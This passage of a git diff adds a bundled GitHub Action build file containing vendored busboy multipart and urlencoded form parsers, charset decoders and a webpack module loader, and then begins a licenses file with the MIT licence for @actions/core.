+Multipart.detect = /^multipart\/form-data/i +function Multipart (boy, cfg) { + let i + let len + const self = this + let boundary + const limits = cfg.limits + const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) + const parsedConType = cfg.parsedConType || [] + const defCharset = cfg.defCharset || 'utf8' + const preservePath = cfg.preservePath + const fileOpts = { highWaterMark: cfg.fileHwm } + + for (i = 0, len = parsedConType.length; i < len; ++i) { + if (Array.isArray(parsedConType[i]) && + RE_BOUNDARY.test(parsedConType[i][0])) { + boundary = parsedConType[i][1] + break + } + } + + function checkFinished () { + if (nends === 0 && finished && !boy._done) { + finished = false + self.end() + } + } + + if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } + + const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) + const filesLimit = getLimit(limits, 'files', Infinity) + const fieldsLimit = getLimit(limits, 'fields', Infinity) + const partsLimit = getLimit(limits, 'parts', Infinity) + const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) + const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) + + let nfiles = 0 + let nfields = 0 + let nends = 0 + let curFile + let curField + let finished = false + + this._needDrain = false + this._pause = false + this._cb = undefined + this._nparts = 0 + this._boy = boy + + const parserCfg = { + boundary, + maxHeaderPairs: headerPairsLimit, + maxHeaderSize: headerSizeLimit, + partHwm: fileOpts.highWaterMark, + highWaterMark: cfg.highWaterMark + } + + this.parser = new Dicer(parserCfg) + this.parser.on('drain', function () { + self._needDrain = false + if (self._cb && !self._pause) { + const cb = self._cb + self._cb = undefined + cb() + } + }).on('part', function onPart (part) { + if (++self._nparts > partsLimit) { + self.parser.removeListener('part', onPart) + self.parser.on('part', skipPart) + boy.hitPartsLimit = true + boy.emit('partsLimit') + return skipPart(part) + } + + // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let + // us emit 'end' early since we know the part has ended if we are already + // seeing the next part + if (curField) { + const field = curField + field.emit('end') + field.removeAllListeners('end') + } + + part.on('header', function (header) { + let contype + let fieldname + let parsed + let charset + let encoding + let filename + let nsize = 0 + + if (header['content-type']) { + parsed = parseParams(header['content-type'][0]) + if (parsed[0]) { + contype = parsed[0].toLowerCase() + for (i = 0, len = parsed.length; i < len; ++i) { + if (RE_CHARSET.test(parsed[i][0])) { + charset = parsed[i][1].toLowerCase() + break + } + } + } + } + + if (contype === undefined) { contype = 'text/plain' } + if (charset === undefined) { charset = defCharset } + + if (header['content-disposition']) { + parsed = parseParams(header['content-disposition'][0]) + if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } + for (i = 0, len = parsed.length; i < len; ++i) { + if (RE_NAME.test(parsed[i][0])) { + fieldname = parsed[i][1] + } else if (RE_FILENAME.test(parsed[i][0])) { + filename = parsed[i][1] + if (!preservePath) { filename = basename(filename) } + } + } + } else { return skipPart(part) } + + if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } + + let onData, + onEnd + + if (isPartAFile(fieldname, contype, filename)) { + // file/binary field + if (nfiles === filesLimit) { + if (!boy.hitFilesLimit) { + boy.hitFilesLimit = true + boy.emit('filesLimit') + } + return skipPart(part) + } + + ++nfiles + + if (!boy._events.file) { + self.parser._ignore() + return + } + + ++nends + const file = new FileStream(fileOpts) + curFile = file + file.on('end', function () { + --nends + self._pause = false + checkFinished() + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + }) + file._read = function (n) { + if (!self._pause) { return } + self._pause = false + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + } + boy.emit('file', fieldname, file, filename, encoding, contype) + + onData = function (data) { + if ((nsize += data.length) > fileSizeLimit) { + const extralen = fileSizeLimit - nsize + data.length + if (extralen > 0) { file.push(data.slice(0, extralen)) } + file.truncated = true + file.bytesRead = fileSizeLimit + part.removeAllListeners('data') + file.emit('limit') + return + } else if (!file.push(data)) { self._pause = true } + + file.bytesRead = nsize + } + + onEnd = function () { + curFile = undefined + file.push(null) + } + } else { + // non-file field + if (nfields === fieldsLimit) { + if (!boy.hitFieldsLimit) { + boy.hitFieldsLimit = true + boy.emit('fieldsLimit') + } + return skipPart(part) + } + + ++nfields + ++nends + let buffer = '' + let truncated = false + curField = part + + onData = function (data) { + if ((nsize += data.length) > fieldSizeLimit) { + const extralen = (fieldSizeLimit - (nsize - data.length)) + buffer += data.toString('binary', 0, extralen) + truncated = true + part.removeAllListeners('data') + } else { buffer += data.toString('binary') } + } + + onEnd = function () { + curField = undefined + if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } + boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) + --nends + checkFinished() + } + } + + /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become + broken. Streams2/streams3 is a huge black box of confusion, but + somehow overriding the sync state seems to fix things again (and still + seems to work for previous node versions). + */ + part._readableState.sync = false + + part.on('data', onData) + part.on('end', onEnd) + }).on('error', function (err) { + if (curFile) { curFile.emit('error', err) } + }) + }).on('error', function (err) { + boy.emit('error', err) + }).on('finish', function () { + finished = true + checkFinished() + }) +} + +Multipart.prototype.write = function (chunk, cb) { + const r = this.parser.write(chunk) + if (r && !this._pause) { + cb() + } else { + this._needDrain = !r + this._cb = cb + } +} + +Multipart.prototype.end = function () { + const self = this + + if (self.parser.writable) { + self.parser.end() + } else if (!self._boy._done) { + process.nextTick(function () { + self._boy._done = true + self._boy.emit('finish') + }) + } +} + +function skipPart (part) { + part.resume() +} + +function FileStream (opts) { + Readable.call(this, opts) + + this.bytesRead = 0 + + this.truncated = false +} + +inherits(FileStream, Readable) + +FileStream.prototype._read = function (n) {} + +module.exports = Multipart + + +/***/ }), + +/***/ 8306: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Decoder = __nccwpck_require__(7100) +const decodeText = __nccwpck_require__(4619) +const getLimit = __nccwpck_require__(1467) + +const RE_CHARSET = /^charset$/i + +UrlEncoded.detect = /^application\/x-www-form-urlencoded/i +function UrlEncoded (boy, cfg) { + const limits = cfg.limits + const parsedConType = cfg.parsedConType + this.boy = boy + + this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) + this.fieldsLimit = getLimit(limits, 'fields', Infinity) + + let charset + for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var + if (Array.isArray(parsedConType[i]) && + RE_CHARSET.test(parsedConType[i][0])) { + charset = parsedConType[i][1].toLowerCase() + break + } + } + + if (charset === undefined) { charset = cfg.defCharset || 'utf8' } + + this.decoder = new Decoder() + this.charset = charset + this._fields = 0 + this._state = 'key' + this._checkingBytes = true + this._bytesKey = 0 + this._bytesVal = 0 + this._key = '' + this._val = '' + this._keyTrunc = false + this._valTrunc = false + this._hitLimit = false +} + +UrlEncoded.prototype.write = function (data, cb) { + if (this._fields === this.fieldsLimit) { + if (!this.boy.hitFieldsLimit) { + this.boy.hitFieldsLimit = true + this.boy.emit('fieldsLimit') + } + return cb() + } + + let idxeq; let idxamp; let i; let p = 0; const len = data.length + + while (p < len) { + if (this._state === 'key') { + idxeq = idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x3D/* = */) { + idxeq = i + break + } else if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesKey } + } + + if (idxeq !== undefined) { + // key with assignment + if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } + this._state = 'val' + + this._hitLimit = false + this._checkingBytes = true + this._val = '' + this._bytesVal = 0 + this._valTrunc = false + this.decoder.reset() + + p = idxeq + 1 + } else if (idxamp !== undefined) { + // key with no assignment + ++this._fields + let key; const keyTrunc = this._keyTrunc + if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + if (key.length) { + this.boy.emit('field', decodeText(key, 'binary', this.charset), + '', + keyTrunc, + false) + } + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if there are encoded bytes... + if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._keyTrunc = true + } + } else { + if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } + p = len + } + } else { + idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesVal } + } + + if (idxamp !== undefined) { + ++this._fields + if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + this._state = 'key' + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if there are encoded bytes... + if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._val === '' && this.fieldSizeLimit === 0) || + (this._bytesVal = this._val.length) === this.fieldSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._valTrunc = true + } + } else { + if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } + p = len + } + } + } + cb() +} + +UrlEncoded.prototype.end = function () { + if (this.boy._done) { return } + + if (this._state === 'key' && this._key.length > 0) { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + '', + this._keyTrunc, + false) + } else if (this._state === 'val') { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + } + this.boy._done = true + this.boy.emit('finish') +} + +module.exports = UrlEncoded + + +/***/ }), + +/***/ 7100: +/***/ ((module) => { + +"use strict"; + + +const RE_PLUS = /\+/g + +const HEX = [ + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +] + +function Decoder () { + this.buffer = undefined +} +Decoder.prototype.write = function (str) { + // Replace '+' with ' ' before decoding + str = str.replace(RE_PLUS, ' ') + let res = '' + let i = 0; let p = 0; const len = str.length + for (; i < len; ++i) { + if (this.buffer !== undefined) { + if (!HEX[str.charCodeAt(i)]) { + res += '%' + this.buffer + this.buffer = undefined + --i // retry character + } else { + this.buffer += str[i] + ++p + if (this.buffer.length === 2) { + res += String.fromCharCode(parseInt(this.buffer, 16)) + this.buffer = undefined + } + } + } else if (str[i] === '%') { + if (i > p) { + res += str.substring(p, i) + p = i + } + this.buffer = '' + ++p + } + } + if (p < len && this.buffer === undefined) { res += str.substring(p) } + return res +} +Decoder.prototype.reset = function () { + this.buffer = undefined +} + +module.exports = Decoder + + +/***/ }), + +/***/ 8647: +/***/ ((module) => { + +"use strict"; + + +module.exports = function basename (path) { + if (typeof path !== 'string') { return '' } + for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var + switch (path.charCodeAt(i)) { + case 0x2F: // '/' + case 0x5C: // '\' + path = path.slice(i + 1) + return (path === '..' || path === '.' ? '' : path) + } + } + return (path === '..' || path === '.' ? '' : path) +} + + +/***/ }), + +/***/ 4619: +/***/ (function(module) { + +"use strict"; + + +// Node has always utf-8 +const utf8Decoder = new TextDecoder('utf-8') +const textDecoders = new Map([ + ['utf-8', utf8Decoder], + ['utf8', utf8Decoder] +]) + +function getDecoder (charset) { + let lc + while (true) { + switch (charset) { + case 'utf-8': + case 'utf8': + return decoders.utf8 + case 'latin1': + case 'ascii': // TODO: Make these a separate, strict decoder? + case 'us-ascii': + case 'iso-8859-1': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'windows-1252': + case 'iso_8859-1:1987': + case 'cp1252': + case 'x-cp1252': + return decoders.latin1 + case 'utf16le': + case 'utf-16le': + case 'ucs2': + case 'ucs-2': + return decoders.utf16le + case 'base64': + return decoders.base64 + default: + if (lc === undefined) { + lc = true + charset = charset.toLowerCase() + continue + } + return decoders.other.bind(charset) + } + } +} + +const decoders = { + utf8: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.utf8Slice(0, data.length) + }, + + latin1: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + return data + } + return data.latin1Slice(0, data.length) + }, + + utf16le: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.ucs2Slice(0, data.length) + }, + + base64: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.base64Slice(0, data.length) + }, + + other: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + + if (textDecoders.has(this.toString())) { + try { + return textDecoders.get(this).decode(data) + } catch (e) { } + } + return typeof data === 'string' + ? data + : data.toString() + } +} + +function decodeText (text, sourceEncoding, destEncoding) { + if (text) { + return getDecoder(destEncoding)(text, sourceEncoding) + } + return text +} + +module.exports = decodeText + + +/***/ }), + +/***/ 1467: +/***/ ((module) => { + +"use strict"; + + +module.exports = function getLimit (limits, name, defaultLimit) { + if ( + !limits || + limits[name] === undefined || + limits[name] === null + ) { return defaultLimit } + + if ( + typeof limits[name] !== 'number' || + isNaN(limits[name]) + ) { throw new TypeError('Limit ' + name + ' is not a valid number') } + + return limits[name] +} + + +/***/ }), + +/***/ 1854: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* eslint-disable object-property-newline */ + + +const decodeText = __nccwpck_require__(4619) + +const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g + +const EncodedLookup = { + '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', + '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', + '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', + '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', + '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', + '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', + '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', + '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', + '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', + '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', + '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', + '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', + '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', + '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', + '%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', + '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', + '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', + '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', + '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', + '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', + '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', + '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', + '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', + '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', + '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', + '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', + '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', + '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', + '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', + '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', + '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', + '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', + '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', + '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', + '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', + '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', + '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', + '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', + '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', + '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', + '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', + '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', + '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', + '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', + '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', + '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', + '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', + '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', + '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', + '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', + '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', + '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', + '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', + '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', + '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', + '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', + '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', + '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', + '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', + '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', + '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', + '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', + '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', + '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', + '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', + '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': '\xca', + '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', + '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', + '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', + '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', + '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', + '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', + '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', + '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', + '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', + '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', + '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', + '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', + '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', + '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', + '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', + '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', + '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', + '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', + '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', + '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', + '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', + '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', + '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', + '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', + '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', + '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', '%F9': '\xf9', + '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', + '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', + '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', + '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', + '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' +} + +function encodedReplacer (match) { + return EncodedLookup[match] +} + +const STATE_KEY = 0 +const STATE_VALUE = 1 +const STATE_CHARSET = 2 +const STATE_LANG = 3 + +function parseParams (str) { + const res = [] + let state = STATE_KEY + let charset = '' + let inquote = false + let escaping = false + let p = 0 + let tmp = '' + const len = str.length + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + const char = str[i] + if (char === '\\' && inquote) { + if (escaping) { escaping = false } else { + escaping = true + continue + } + } else if (char === '"') { + if (!escaping) { + if (inquote) { + inquote = false + state = STATE_KEY + } else { inquote = true } + continue + } else { escaping = false } + } else { + if (escaping && inquote) { tmp += '\\' } + escaping = false + if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { + if (state === STATE_CHARSET) { + state = STATE_LANG + charset = tmp.substring(1) + } else { state = STATE_VALUE } + tmp = '' + continue + } else if (state === STATE_KEY && + (char === '*' || char === '=') && + res.length) { + state = char === '*' + ? STATE_CHARSET + : STATE_VALUE + res[p] = [tmp, undefined] + tmp = '' + continue + } else if (!inquote && char === ';') { + state = STATE_KEY + if (charset) { + if (tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } + charset = '' + } else if (tmp.length) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } + tmp = '' + ++p + continue + } else if (!inquote && (char === ' ' || char === '\t')) { continue } + } + tmp += char + } + if (charset && tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } else if (tmp) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + + if (res[p] === undefined) { + if (tmp) { res[p] = tmp } + } else { res[p][1] = tmp } + + return res +} + +module.exports = parseParams + + +/***/ }) + +/******/ }); +/************************************************************************/ +/******/ // The module cache +/******/ var __webpack_module_cache__ = {}; +/******/ +/******/ // The require function +/******/ function __nccwpck_require__(moduleId) { +/******/ // Check if module is in cache +/******/ var cachedModule = __webpack_module_cache__[moduleId]; +/******/ if (cachedModule !== undefined) { +/******/ return cachedModule.exports; +/******/ } +/******/ // Create a new module (and put it into the cache) +/******/ var module = __webpack_module_cache__[moduleId] = { +/******/ // no module.id needed +/******/ // no module.loaded needed +/******/ exports: {} +/******/ }; +/******/ +/******/ // Execute the module function +/******/ var threw = true; +/******/ try { +/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); +/******/ threw = false; +/******/ } finally { +/******/ if(threw) delete __webpack_module_cache__[moduleId]; +/******/ } +/******/ +/******/ // Return the exports of the module +/******/ return module.exports; +/******/ } +/******/ +/************************************************************************/ +/******/ /* webpack/runtime/compat */ +/******/ +/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; +/******/ +/************************************************************************/ +/******/ +/******/ // startup +/******/ // Load entry module and return exports +/******/ // This entry module is referenced by other modules so it can't be inlined +/******/ var __webpack_exports__ = __nccwpck_require__(6144); +/******/ module.exports = __webpack_exports__; +/******/ +/******/ })() +; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt new file mode 100644 index 000000000000..cd36a2d85eff --- /dev/null +++ b/.github/action/dist/licenses.txt @@ -0,0 +1,175 @@ +@actions/core +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 